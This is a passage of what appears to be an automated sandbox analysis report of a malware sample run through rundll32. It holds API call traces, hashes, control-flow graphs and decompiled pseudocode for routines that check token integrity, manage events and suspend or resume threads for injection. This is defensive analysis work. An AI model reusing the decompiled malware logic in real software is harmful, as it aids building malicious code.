                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
                                                          • String ID:
                                                          • API String ID: 2910951584-0
                                                          • Opcode ID: eaaac5ebec24e12a127d9215d8fd2d1eb9396c09fde11d19661226c9a1ff1087
                                                          • Instruction ID: b7971044e14892713fae16bc89eed619cf2312876bcf8f26fad58706b697ef20
                                                          • Opcode Fuzzy Hash: eaaac5ebec24e12a127d9215d8fd2d1eb9396c09fde11d19661226c9a1ff1087
                                                          • Instruction Fuzzy Hash: F051E0B1900214AFDB24DBA59C46BAE73F8AB0470BF141D25FD04F72A1E7709D8C8B91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557E712, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 0557623F: VirtualProtect.KERNEL32(?,?,00000040,?), ref: 05576264
                                                            • Part of subcall function 0557623F: GetLastError.KERNEL32 ref: 0557626C
                                                            • Part of subcall function 0557623F: VirtualQuery.KERNEL32(?,?,0000001C), ref: 05576283
                                                            • Part of subcall function 0557623F: VirtualProtect.KERNEL32(?,?,-2C9B417C,?), ref: 055762A8
                                                          • GetLastError.KERNEL32(?,?,00000000,?,05598560,0000001C,0557C114,00000002,?,00000001,?,?,?,00000000,?), ref: 0557E86B
                                                            • Part of subcall function 05591A69: lstrlen.KERNEL32(?,?), ref: 05591AA1
                                                            • Part of subcall function 05591A69: lstrcpy.KERNEL32(00000000,?), ref: 05591AB8
                                                            • Part of subcall function 05591A69: StrChrA.SHLWAPI(00000000,0000002E), ref: 05591AC1
                                                            • Part of subcall function 05591A69: GetModuleHandleA.KERNEL32(00000000), ref: 05591ADF
                                                          • VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,?,?,?,?,?,?,00000000,?,05598560,0000001C,0557C114,00000002), ref: 0557E7E9
                                                          • VirtualProtect.KERNEL32(?,00000004,?,?,?,?,?,?,00000000,?,05598560,0000001C,0557C114,00000002,?,00000001), ref: 0557E804
                                                          • RtlEnterCriticalSection.NTDLL(0559C300), ref: 0557E828
                                                          • RtlLeaveCriticalSection.NTDLL(0559C300), ref: 0557E846
                                                            • Part of subcall function 0557623F: SetLastError.KERNEL32(?), ref: 055762B1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 899430048-3916222277
                                                          • Opcode ID: 37cd36d9f2f4e2dc7abf7b76ce1bd3d125755f0cba2091f83a77bbe934cc90af
                                                          • Instruction ID: c9ec858e7df841b20f9d5c1ec8af43b6fd9ff06e9936c8cb122fd26293dc85f4
                                                          • Opcode Fuzzy Hash: 37cd36d9f2f4e2dc7abf7b76ce1bd3d125755f0cba2091f83a77bbe934cc90af
                                                          • Instruction Fuzzy Hash: 4B418B7190070AEFDF14DFA9D849AADBBB9FF48310F04825AE815AB250D734E954CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E54BAC, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92synchronizationCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 484 e54bac-e54be0 call e53d0e 487 e54be2-e54bf4 CreateEventA call e513cc 484->487 488 e54bf9-e54c00 484->488 487->488 490 e54c07-e54c0b 488->490 491 e54c02-e54c05 488->491 492 e54c55-e54c5b 490->492 493 e54c0d-e54c14 call e52102 490->493 491->490 491->492 494 e54c60-e54c62 call e52f12 492->494 495 e54c5d 492->495 493->492 499 e54c16-e54c25 StrChrW 493->499 500 e54c67-e54c6b 494->500 495->494 501 e54c27-e54c2c 499->501 502 e54c2d-e54c34 call e5663c 499->502 503 e54c6d-e54c6f 500->503 504 e54c7f-e54c81 500->504 501->502 512 e54c39-e54c3d 502->512 503->504 506 e54c71-e54c7d WaitForSingleObject 503->506 507 e54c83-e54c85 504->507 508 e54c8a-e54c8c 504->508 506->504 507->508 509 e54c87 507->509 510 e54c95-e54c9c 508->510 511 e54c8e-e54c8f CloseHandle 508->511 509->508 511->510 512->492 513 e54c3f-e54c41 512->513 513->510 514 e54c43-e54c53 WaitForSingleObject 513->514 514->492 514->508
                                                          C-Code - Quality: 100%
                                                          			E00E54BAC(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				long _t14;
				void* _t18;
				long _t21;
				void* _t25;
				void* _t26;
				signed int* _t27;
				signed short* _t28;
				CHAR* _t30;
				long _t31;
				WCHAR** _t32;

				_t6 =  *0xe5a2c8; // 0xbd092303
				_t1 =  &_a4; // 0xe5757a
				_t32 =  *_t1;
				_a4 = _t6 ^ 0xd05b5869;
				_t8 =  *0xe5a2d4; // 0x435d5a8
				_t3 = _t8 + 0xe5b84d; // 0x61636f4c
				_t25 = 0;
				_t30 = E00E53D0E(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0xe5a2f8, 1, 0, _t30);
					E00E513CC(_t30);
				}
				_t12 =  *0xe5a2b4; // 0x4000000a
				if(_t12 != 6 || _t12 < 2) {
					if( *_t32 == 0) {
						goto L11;
					}
					_t18 = E00E52102(); // executed
					if(_t18 != 0) {
						goto L11;
					}
					_t28 = StrChrW( *_t32, 0x20);
					if(_t28 != 0) {
						 *_t28 =  *_t28 & 0x00000000;
						_t28 =  &(_t28[1]);
					}
					_t21 = E00E5663C(0, _t28,  *_t32, 0); // executed
					_t31 = _t21;
					if(_t31 == 0) {
						if(_t25 == 0) {
							goto L21;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							goto L19;
						}
					}
					goto L11;
				} else {
					L11:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t14 = E00E52F12(_t32, _t26); // executed
					_t31 = _t14;
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t27 != 0 && _t31 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					L19:
					if(_t25 != 0) {
						CloseHandle(_t25);
					}
					L21:
					return _t31;
				}
			}


















                                                          0x00e54bad
                                                          0x00e54bb4
                                                          0x00e54bb4
                                                          0x00e54bbe
                                                          0x00e54bc2
                                                          0x00e54bc8
                                                          0x00e54bd5
                                                          0x00e54bdc
                                                          0x00e54be0
                                                          0x00e54bf2
                                                          0x00e54bf4
                                                          0x00e54bf4
                                                          0x00e54bf9
                                                          0x00e54c00
                                                          0x00e54c0b
                                                          0x00000000
                                                          0x00000000
                                                          0x00e54c0d
                                                          0x00e54c14
                                                          0x00000000
                                                          0x00000000
                                                          0x00e54c21
                                                          0x00e54c25
                                                          0x00e54c27
                                                          0x00e54c2c
                                                          0x00e54c2c
                                                          0x00e54c34
                                                          0x00e54c39
                                                          0x00e54c3d
                                                          0x00e54c41
                                                          0x00000000
                                                          0x00000000
                                                          0x00e54c4f
                                                          0x00e54c53
                                                          0x00000000
                                                          0x00000000
                                                          0x00e54c53
                                                          0x00000000
                                                          0x00e54c55
                                                          0x00e54c55
                                                          0x00e54c55
                                                          0x00e54c5b
                                                          0x00e54c5d
                                                          0x00e54c5d
                                                          0x00e54c62
                                                          0x00e54c67
                                                          0x00e54c6b
                                                          0x00e54c7d
                                                          0x00e54c7d
                                                          0x00e54c81
                                                          0x00e54c87
                                                          0x00e54c87
                                                          0x00e54c8a
                                                          0x00e54c8c
                                                          0x00e54c8f
                                                          0x00e54c8f
                                                          0x00e54c96
                                                          0x00e54c9c
                                                          0x00e54c9c

                                                          APIs
                                                            • Part of subcall function 00E53D0E: lstrlen.KERNEL32(E8FA7DD7,00000000,69B25F44,00000027,00000000,051B9CD0,74ECC740,KE,?,69B25F44,E8FA7DD7,00000000,?,?,?,00E5454B), ref: 00E53D44
                                                            • Part of subcall function 00E53D0E: lstrcpy.KERNEL32(00000000,00000000), ref: 00E53D68
                                                            • Part of subcall function 00E53D0E: lstrcat.KERNEL32(00000000,00000000), ref: 00E53D70
                                                          • CreateEventA.KERNEL32(00E5A2F8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,00E5757A,?,?,?), ref: 00E54BEB
                                                            • Part of subcall function 00E513CC: RtlFreeHeap.NTDLL(00000000,00000000,00E520F3,00000000,00000000,?,00000000,?,?,?,?,?,00E568A9,00000000,?,00000001), ref: 00E513D8
                                                          • StrChrW.SHLWAPI(zu,00000020,61636F4C,00000001,00000000,?,?,00000000,?,00E5757A,?,?,?), ref: 00E54C1B
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,zu,00000000,?,00000000,?,00E5757A,?,?,?,?,?,?,yE,00E5519C), ref: 00E54C49
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,00E5757A,?,?,?), ref: 00E54C77
                                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,00E5757A,?,?,?,?,?,?,yE), ref: 00E54C8F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                          • String ID: zu
                                                          • API String ID: 73268831-1569895686
                                                          • Opcode ID: a4410e6cf59d285b2dcb9e20ce494a8f1de10656b68f3fc8c972c2e68731ebd3
                                                          • Instruction ID: c9c4d37c03c0411b535eb6faecb02f717af93889de1f3ed2c959d8e32ec3a29c
                                                          • Opcode Fuzzy Hash: a4410e6cf59d285b2dcb9e20ce494a8f1de10656b68f3fc8c972c2e68731ebd3
                                                          • Instruction Fuzzy Hash: 8A210AB25023125BE7214B699C45B5AB3E8AF9475FF052E24FE06BB2D1D770CC4C4640
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05571E67, Relevance: 10.6, APIs: 7, Instructions: 84sleepthreadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 0558F841: memset.NTDLL ref: 0558F84B
                                                          • OpenEventA.KERNEL32(00000002,00000000,0559C1E4,7519F560,00000000,?,?,0558D3D0), ref: 05571F01
                                                          • SetEvent.KERNEL32(00000000,?,?,0558D3D0), ref: 05571F0E
                                                          • Sleep.KERNEL32(00000BB8,?,?,0558D3D0), ref: 05571F19
                                                          • ResetEvent.KERNEL32(00000000,?,?,0558D3D0), ref: 05571F20
                                                          • CloseHandle.KERNEL32(00000000,?,?,0558D3D0), ref: 05571F27
                                                          • GetShellWindow.USER32 ref: 05571F32
                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 05571F39
                                                            • Part of subcall function 05579005: RegCloseKey.ADVAPI32(?), ref: 05579088
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
                                                          • String ID:
                                                          • API String ID: 53838381-0
                                                          • Opcode ID: b6c51602b7ff06ce6c0c2c3a095302c63995f5da22f713d2bc26636c85fa88d6
                                                          • Instruction ID: 9f113a902b44f5224967e2c2afadab82250780362ac00c694fd594898556e80f
                                                          • Opcode Fuzzy Hash: b6c51602b7ff06ce6c0c2c3a095302c63995f5da22f713d2bc26636c85fa88d6
                                                          • Instruction Fuzzy Hash: 3C21A132214509BBC2116B66BC8EE2B7F6DFBCA660B064106F51AD7140DF395808FB75
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E55FD1, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00E55FD1(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0xe5a2b4 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E00E55FBC(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E00E513CC(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                                          0x00e55fde
                                                          0x00e55fe5
                                                          0x00e55fec
                                                          0x00e56000
                                                          0x00e5600b
                                                          0x00e56023
                                                          0x00e56030
                                                          0x00e56033
                                                          0x00e56038
                                                          0x00e56043
                                                          0x00e56047
                                                          0x00e56056
                                                          0x00e5605a
                                                          0x00e56076
                                                          0x00e56076
                                                          0x00e5607a
                                                          0x00e5607a
                                                          0x00e5607f
                                                          0x00e56083
                                                          0x00e56089
                                                          0x00e5608a
                                                          0x00e56091
                                                          0x00e56097

                                                          APIs
                                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00E56003
                                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 00E56023
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00E56033
                                                          • CloseHandle.KERNEL32(00000000), ref: 00E56083
                                                            • Part of subcall function 00E55FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00E52035), ref: 00E55FC8
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 00E56056
                                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00E5605E
                                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00E5606E
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                          • String ID:
                                                          • API String ID: 1295030180-0
                                                          • Opcode ID: f55ae9680112d762c14acb1afa8cf14b4c86d98d3c0e932af110ef85f3b8fe63
                                                          • Instruction ID: 4db27d8f20a8878ec85a73aaa19e8d619bab22b1167ac4e359f1d310edc56bc1
                                                          • Opcode Fuzzy Hash: f55ae9680112d762c14acb1afa8cf14b4c86d98d3c0e932af110ef85f3b8fe63
                                                          • Instruction Fuzzy Hash: A5215C75900219FFEB109F91CC44EAEBBB8EB04305F0045A5F911B72A1C7714E08EB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E5682B, Relevance: 10.6, APIs: 7, Instructions: 73sleepmemorytimeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 73%
                                                          			E00E5682B(signed int __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				char _v32;
				long _v40;
				void* _t14;
				void* _t16;
				int _t18;
				signed int _t20;
				void* _t22;
				signed int _t23;
				intOrPtr _t25;
				unsigned int _t29;
				signed int _t34;
				signed int _t41;

				_t34 = __edx;
				_t14 = HeapCreate(0, 0x400000, 0); // executed
				 *0xe5a290 = _t14;
				if(_t14 != 0) {
					 *0xe5a180 = GetTickCount();
					_t16 = E00E51DFA(_a4);
					if(_t16 != 0) {
						L10:
						return _t16;
					} else {
						goto L3;
					}
					do {
						L3:
						GetSystemTimeAsFileTime( &_v12);
						_t18 = SwitchToThread();
						_t29 = _v12.dwHighDateTime;
						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 5;
						_push(0);
						_push(0x13);
						_push(_t29 >> 5);
						_push(_t20);
						L00E57F3A();
						_t41 = _t18 + _t20;
						_t22 = E00E51FE8(_a4, _t41);
						_t23 = 3;
						Sleep(_t23 << (_t41 & 0x00000007)); // executed
					} while (_t22 == 1);
					_t25 =  *0xe5a2ac; // 0x2f0
					_v32 = 0;
					if(_t25 != 0) {
						__imp__(_t25,  &_v32);
						if(_t25 == 0) {
							_v40 = 0;
						}
						if(_v40 != 0) {
							 *0xe5a2b8 = 1; // executed
						}
					}
					_t16 = E00E5435F(_t34); // executed
					goto L10;
				}
				_t16 = 8;
				goto L10;
			}
















                                                          0x00e5682b
                                                          0x00e56840
                                                          0x00e56848
                                                          0x00e5684d
                                                          0x00e56860
                                                          0x00e56865
                                                          0x00e5686c
                                                          0x00e568f7
                                                          0x00e568fd
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e56872
                                                          0x00e56872
                                                          0x00e56877
                                                          0x00e5687d
                                                          0x00e56883
                                                          0x00e5688d
                                                          0x00e56891
                                                          0x00e56892
                                                          0x00e56897
                                                          0x00e56898
                                                          0x00e56899
                                                          0x00e5689e
                                                          0x00e568a4
                                                          0x00e568af
                                                          0x00e568b6
                                                          0x00e568bc
                                                          0x00e568c1
                                                          0x00e568c8
                                                          0x00e568cc
                                                          0x00e568d4
                                                          0x00e568dc
                                                          0x00e568de
                                                          0x00e568de
                                                          0x00e568e6
                                                          0x00e568e8
                                                          0x00e568e8
                                                          0x00e568e6
                                                          0x00e568f2
                                                          0x00000000
                                                          0x00e568f2
                                                          0x00e56851
                                                          0x00000000

                                                          APIs
                                                          • HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001), ref: 00E56840
                                                          • GetTickCount.KERNEL32 ref: 00E56857
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 00E56877
                                                          • SwitchToThread.KERNEL32(?,00000001), ref: 00E5687D
                                                          • _aullrem.NTDLL(?,?,00000013,00000000), ref: 00E56899
                                                          • Sleep.KERNEL32(00000003,00000000,?,00000001), ref: 00E568B6
                                                          • IsWow64Process.KERNEL32(000002F0,?,?,00000001), ref: 00E568D4
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
                                                          • String ID:
                                                          • API String ID: 3690864001-0
                                                          • Opcode ID: f77edacebe2275d8903b3f79b218f7abd61c624e4d607e3fbd387e4951f47209
                                                          • Instruction ID: ad70f9ff9386bd87467399ce29ddb1661147c280a97d4da382d9c44c2dae6117
                                                          • Opcode Fuzzy Hash: f77edacebe2275d8903b3f79b218f7abd61c624e4d607e3fbd387e4951f47209
                                                          • Instruction Fuzzy Hash: 3021F3B2A00304AFD718AFA5EC89A9A77E8A744357F444D3DF905E3190E774C84C8B61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E57156, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 64%
                                                          			E00E57156(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0xe5a2d4; // 0x435d5a8
				_t1 = _t9 + 0xe5b61b; // 0x253d7325
				_t36 = 0;
				_t28 = E00E53420(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x51b9631
					_t40 = E00E55FBC(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E00E56E5D(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E00E513CC(_t40);
						_t42 = E00E5216C(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E00E513CC(_t36);
							_t36 = _t42;
						}
						_t43 = E00E54FE5(_t36, _t33);
						if(_t43 != 0) {
							E00E513CC(_t36);
							_t36 = _t43;
						}
					}
					E00E513CC(_t28);
				}
				return _t36;
			}
















                                                          0x00e57156
                                                          0x00e57159
                                                          0x00e5715a
                                                          0x00e57161
                                                          0x00e57168
                                                          0x00e5716f
                                                          0x00e57173
                                                          0x00e5717a
                                                          0x00e57181
                                                          0x00e57186
                                                          0x00e5718e
                                                          0x00e57198
                                                          0x00e5719c
                                                          0x00e571a0
                                                          0x00e571a6
                                                          0x00e571ab
                                                          0x00e571b5
                                                          0x00e571bb
                                                          0x00e571bd
                                                          0x00e571d4
                                                          0x00e571d8
                                                          0x00e571db
                                                          0x00e571e0
                                                          0x00e571e0
                                                          0x00e571e9
                                                          0x00e571ed
                                                          0x00e571f0
                                                          0x00e571f5
                                                          0x00e571f5
                                                          0x00e571ed
                                                          0x00e571f8
                                                          0x00e571fd
                                                          0x00e57203

                                                          APIs
                                                            • Part of subcall function 00E53420: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00E5716F,253D7325,00000000,00000000,?,00000000,00E54A9F), ref: 00E53487
                                                            • Part of subcall function 00E53420: sprintf.NTDLL ref: 00E534A8
                                                          • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00E54A9F,00000000,051B9630), ref: 00E57181
                                                          • lstrlen.KERNEL32(00000000,?,00000000,00E54A9F,00000000,051B9630), ref: 00E57189
                                                            • Part of subcall function 00E55FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00E52035), ref: 00E55FC8
                                                          • strcpy.NTDLL ref: 00E571A0
                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 00E571AB
                                                            • Part of subcall function 00E56E5D: lstrlen.KERNEL32(00000000,00000000,00E54A9F,00000000,?,00E571BA,00000000,00E54A9F,?,00000000,00E54A9F,00000000,051B9630), ref: 00E56E6E
                                                            • Part of subcall function 00E513CC: RtlFreeHeap.NTDLL(00000000,00000000,00E520F3,00000000,00000000,?,00000000,?,?,?,?,?,00E568A9,00000000,?,00000001), ref: 00E513D8
                                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00E54A9F,?,00000000,00E54A9F,00000000,051B9630), ref: 00E571C8
                                                            • Part of subcall function 00E5216C: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,00E571D4,00000000,?,00000000,00E54A9F,00000000,051B9630), ref: 00E52176
                                                            • Part of subcall function 00E5216C: _snprintf.NTDLL ref: 00E521D4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                          • String ID: =
                                                          • API String ID: 2864389247-1428090586
                                                          • Opcode ID: 4a63844f34605484e09c1555bcac503648e5e4c3855772f30cdc3a18ef03d83a
                                                          • Instruction ID: 5979d70734f024a231cf01af3f0e77ec0e77c67ae8b956a4788e89ea65c8285f
                                                          • Opcode Fuzzy Hash: 4a63844f34605484e09c1555bcac503648e5e4c3855772f30cdc3a18ef03d83a
                                                          • Instruction Fuzzy Hash: 9011E3375026267B47126BB49C45CAF37DD9F4575A7053C65FE00B7212CE34CD0987A4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558F0B6, Relevance: 9.1, APIs: 6, Instructions: 125threadsynchronizationinjectionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.NTDLL ref: 0558F0D9
                                                            • Part of subcall function 055724A8: OpenProcess.KERNEL32(00000400,00000000,?), ref: 055724C3
                                                            • Part of subcall function 055724A8: IsWow64Process.KERNEL32(?,?), ref: 055724D4
                                                            • Part of subcall function 055724A8: CloseHandle.KERNEL32(?,?,?), ref: 055724E7
                                                          • ResumeThread.KERNEL32(?,?,00000000,00000000,00000004,?,00000000,75144EE0,00000000), ref: 0558F193
                                                          • WaitForSingleObject.KERNEL32(00000064), ref: 0558F1A1
                                                          • SuspendThread.KERNEL32(?), ref: 0558F1B4
                                                            • Part of subcall function 055737F6: memset.NTDLL ref: 05573AB7
                                                          • ResumeThread.KERNEL32(?), ref: 0558F237
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Thread$ProcessResumememset$CloseHandleObjectOpenSingleSuspendWaitWow64
                                                          • String ID:
                                                          • API String ID: 568453049-0
                                                          • Opcode ID: 1f2d00031cfff9b284e120b84af662434745c3d85cdbfe3779be4f5c2b9a8078
                                                          • Instruction ID: 86369fa7566815df32c68a6022754f790c7adf1e55df025be3e71f01a77d78b1
                                                          • Opcode Fuzzy Hash: 1f2d00031cfff9b284e120b84af662434745c3d85cdbfe3779be4f5c2b9a8078
                                                          • Instruction Fuzzy Hash: 3A419E76A00209ABDF11EFA4DC88EBEBBBAFF48350F144466F906A2150D735EA55DB10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E54DA1, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00E53686: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,051B89D0,00E54DD1,?,?,?,?,?,?,?,?,?,?,?,00E54DD1), ref: 00E53752
                                                            • Part of subcall function 00E56566: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 00E565A3
                                                            • Part of subcall function 00E56566: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 00E565D4
                                                          • SysAllocString.OLEAUT32(?), ref: 00E54DFD
                                                          • SysAllocString.OLEAUT32(0070006F), ref: 00E54E11
                                                          • SysAllocString.OLEAUT32(00000000), ref: 00E54E23
                                                          • SysFreeString.OLEAUT32(00000000), ref: 00E54E87
                                                          • SysFreeString.OLEAUT32(00000000), ref: 00E54E96
                                                          • SysFreeString.OLEAUT32(00000000), ref: 00E54EA1
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
